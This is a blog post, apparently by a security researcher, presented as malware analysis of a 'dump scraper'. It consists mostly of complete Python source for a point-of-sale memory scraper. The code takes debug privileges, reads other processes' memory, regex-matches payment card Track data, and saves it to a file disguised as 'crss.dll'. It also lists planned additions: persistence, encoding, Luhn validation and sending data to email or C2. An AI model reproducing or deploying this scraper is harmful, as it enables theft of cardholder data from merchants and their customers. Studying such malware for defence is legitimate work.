Malware Analysis: Dump Scraper Implementation in Python Using winappdbg, getpass, re, sys Method of Operation of Scanning explorer.exe for Dump Data: (1) Show the Windows version and the current architecture (from winappdbg (System.os, System.arch, System.bits)) (2) Create a snapshot of running processes (from winappdbg.System (request_debug_privileges(), scan_processes()) (3) Obtain local username (from getpass.getuser()) (4) Create a writeable file in Application Data Dump_Writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\\\crss.dll', 'w+') (5) Obtain all processes that match the requested filenames. # Elevate privileges system.request_debug_privileges() system.scan_processes() for process, filename in system.find_processes_by_filename("explorer.exe"): pid = process.get_pid() bits = process.get_bits() print pid, bits (6) Get a memory map of the process. memoryMap = process.get_memory_map() mappedFilenames = process.get_mapped_filenames(memoryMap) (7) For each memory block in the map read address and size of memory blocks, its state (free or allocated), page protection bits (looking for win32.MEM_COMMIT), and its memory type (8) Read the data from memory if mbi.has_content() and mbi.State == win32.MEM_COMMIT Data = process.read(BaseAddress, RegionSize) (9) Implement a simple Regular Expression looking for Track2 data Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data) Dump_Data.append(Dump_Regex) (10) Beatufy the extracted dump data (11) Write dump data into crss.dll Missing features are as follows: (1) Add Registry Persistence (2) Encode Saved Data (3) Add Luhn Algorithm (4) Create a process for this algorithm (5) Send data to email/C2 import sys
import winappdbg from winappdbg import System, win32 import re import getpass # Show the Windows version and the current architecture. print "Running on %s for the %s architecture." % (System.os, System.arch) if System.wow64: print "Running in 32 bit emulation mode." print "From this Python VM we can attach to %d-bit processes." % System.bits # Create a snaphot of running processes. system = winappdbg.System() system.request_debug_privileges() system.scan_processes() UserName = getpass.getuser() # if win64 is active, follows the following filesystem convention # Dump_Writer = open('C:\\Users\\'+UserName+'\\AppData\\Roaming\\athena.dll', 'w+') Dump_Writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\\\crss.dll', 'w+') Dump_Data = [] # Get all processes that match the requested filenames. for filename in sys.argv[1:]: print "Looking for: %s" % filename for process, pathname in system.find_processes_by_filename(filename): pid = process.get_pid() bits = process.get_bits() print "Dumping memory for process ID %d (%d bits)" % (pid, bits) # Get a memory map of the process. memoryMap = process.get_memory_map() mappedFilenames = process.get_mapped_filenames(memoryMap) # For each memory block in the map... for mbi in memoryMap: # Address and size of memory block. BaseAddress = mbi.BaseAddress RegionSize = mbi.RegionSize # State (free or allocated). if mbi.State == win32.MEM_RESERVE: State = "Reserved" elif mbi.State == win32.MEM_COMMIT: State = "Commited" elif mbi.State == win32.MEM_FREE: State = "Free" else: State = "Unknown" # Page protection bits (R/W/X/G). if mbi.State != win32.MEM_COMMIT: Protect = "" else: if mbi.Protect & win32.PAGE_NOACCESS: Protect = "--- " elif mbi.Protect & win32.PAGE_READONLY: Protect = "R-- " elif mbi.Protect & win32.PAGE_READWRITE: Protect = "RW- " elif mbi.Protect & win32.PAGE_WRITECOPY: Protect = "RC- " elif mbi.Protect & win32.PAGE_EXECUTE: Protect = "--X " elif mbi.Protect & win32.PAGE_EXECUTE_READ: Protect = "R-X " elif mbi.Protect & win32.PAGE_EXECUTE_READWRITE: Protect = "RWX " elif mbi.Protect & win32.PAGE_EXECUTE_WRITECOPY: Protect = "RCX " else: Protect = "??? " if mbi.Protect & win32.PAGE_GUARD: Protect += "G" else: Protect += "-" if mbi.Protect & win32.PAGE_NOCACHE: Protect += "N" else: Protect += "-" if mbi.Protect & win32.PAGE_WRITECOMBINE: Protect += "W" else: Protect += "-" # Type (file mapping, executable image, or private memory). if mbi.Type == win32.MEM_IMAGE: Type = "Image" elif mbi.Type == win32.MEM_MAPPED: Type = "Mapped" elif mbi.Type == win32.MEM_PRIVATE: Type = "Private" elif mbi.Type == 0: Type = "" else: Type = "Unknown" # Mapped file name, if any. FileName = mappedFilenames.get(BaseAddress, None) # Read the data contained in the memory block, if any. Data = None if mbi.has_content() and mbi.State == win32.MEM_COMMIT: ## print 'Reading %s-%s' % ( ## winappdbg.HexDump.address(BaseAddress, bits), ## winappdbg.HexDump.address(BaseAddress + RegionSize, bits) ## ) Data = process.read(BaseAddress, RegionSize) Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data) Dump_Data.append(Dump_Regex) Clean_Dump = [] for i in Dump_Data: i = str(i) if str(i) not in Clean_Dump: Clean_Dump.append(str(i)) Clean_Dump.pop(0) i = str(Clean_Dump[0]) line = re.sub('\[', '', i) line1 = re.sub('\]', '', line) line2 = re.sub('\'', '', line1) line3 = re.sub('\s', '', line2) g = line3.split(',') g = set(g) for i in g: if i not in Dump_Writer: Dump_Writer.write(i + "\n") print "Done." Dump_Writer.close() ''' from distutils.core import setup setup( name='ramscraper', version='1.0', packages=['sys, winappdbg, re, getpass'], url='http://www.vkremez.com', license='Apache License, Version 2.0', author='Administrator', author_email='vitali@vkremez.com', description='Memory Scraper Emulation' ) '''
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
January 2016
Categories |